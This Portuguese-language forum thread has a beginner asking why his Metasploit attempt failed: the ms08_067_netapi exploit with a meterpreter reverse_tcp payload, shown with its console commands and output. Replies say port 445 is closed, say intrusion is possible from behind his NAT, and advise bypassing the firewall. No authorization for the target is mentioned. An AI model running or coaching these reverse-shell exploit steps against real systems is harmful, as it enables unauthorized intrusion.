Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Pentest - Ajuda

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Pentest - Ajuda

    Bem, sou novo aqui no fórum e estou começando com metasploit. Esta mesma pergunta, eu fiz no Yahoo Answers e não obtive nenhuma luz. Estou usando o BackTrack 5. E olha só:
    No console do metasploit:
    ...
    set rhost X.X.X.X
    set lhost X.X.X.X
    set payload windows/meterpreter/reverse_tcp
    exploit

    e:

    [-] Handler failed to bind to X.X.X.X:4444 //(x.x.x.x = lhost)[*] Started reverse handler on 0.0.0.0:4444
    [-] Exploit exception: The connection timed out (X.X.X.X:445). //(x.x.x.x = rhost)[*] Exploit completed, but no session was created.
    msf exploit(ms08_067_netapi) >

    Como podemos observar, essa bagaça, não funcionou. A causa, como foi retornado é o meu ip local.
    a minha duvida é quanto a isso.
    Minha internet, é fornecida via rádio por uma empresa de minha cidade. Eu capto-a com uma anteninha e tals e ela chega até meu roteador e é distriduída pela casa, mas meu pc está conectado via cabo ao roteador.
    Quando eu digito "ifconfig" no console, o ip retornado é "10.0.0.101"(o que parece ser o ip de minha rede). Veja a situação:

    EMPRESA > WIFI > ANTENA GRANDE(CASA) > CABO > MEU ROTEADOR > CABO > MEU PC

    No teste ali em cima eu usei o ip retornado do site "http://meuip.datahouse.com.br/" e parece que não funcionou.

    Minha duvida é:
    É possivel realizar uma invasão com a minha situação?
    Se não é, poderiam informarme a causa? eu gostaria de soluciona-la

    Desculpem minha ignorância quanto, ao assunto, eu sou um pouco leigo e simplesmente quero aprender

    Muito obrigado galera.
    Similar Threads

  • Font Size
    #2
    Postado Originalmente por rafalunelli Ver Post
    Bem, sou novo aqui no fórum e estou começando com metasploit. Esta mesma pergunta, eu fiz no Yahoo Answers e não obtive nenhuma luz. Estou usando o BackTrack 5. E olha só:
    No console do metasploit:
    ...
    set rhost X.X.X.X
    set lhost X.X.X.X
    set payload windows/meterpreter/reverse_tcp
    exploit

    e:

    [-] Handler failed to bind to X.X.X.X:4444 //(x.x.x.x = lhost)[*] Started reverse handler on 0.0.0.0:4444
    [-] Exploit exception: The connection timed out (X.X.X.X:445). //(x.x.x.x = rhost)[*] Exploit completed, but no session was created.
    msf exploit(ms08_067_netapi) >

    Como podemos observar, essa bagaça, não funcionou. A causa, como foi retornado é o meu ip local.
    a minha duvida é quanto a isso.
    Minha internet, é fornecida via rádio por uma empresa de minha cidade. Eu capto-a com uma anteninha e tals e ela chega até meu roteador e é distriduída pela casa, mas meu pc está conectado via cabo ao roteador.
    Quando eu digito "ifconfig" no console, o ip retornado é "10.0.0.101"(o que parece ser o ip de minha rede). Veja a situação:

    EMPRESA > WIFI > ANTENA GRANDE(CASA) > CABO > MEU ROTEADOR > CABO > MEU PC

    No teste ali em cima eu usei o ip retornado do site "http://meuip.datahouse.com.br/" e parece que não funcionou.

    Minha duvida é:
    É possivel realizar uma invasão com a minha situação?
    Se não é, poderiam informarme a causa? eu gostaria de soluciona-la

    Desculpem minha ignorância quanto, ao assunto, eu sou um pouco leigo e simplesmente quero aprender

    Muito obrigado galera.
    Pelo erro que apareceu a porta 445 tá fechada ou host off, e sim é possivel realizar um invasão na sua situação.


    Notify-list ~ Twitter ~ E-mail

    Comment


    • Font Size
      #3
      acho que tem algum servidor Linux de Borda na Rede , tornando impossível qualquer conexão até mesmo com Armitage , tem que burlar o firewall!

      Comment

      X
      Working...
      X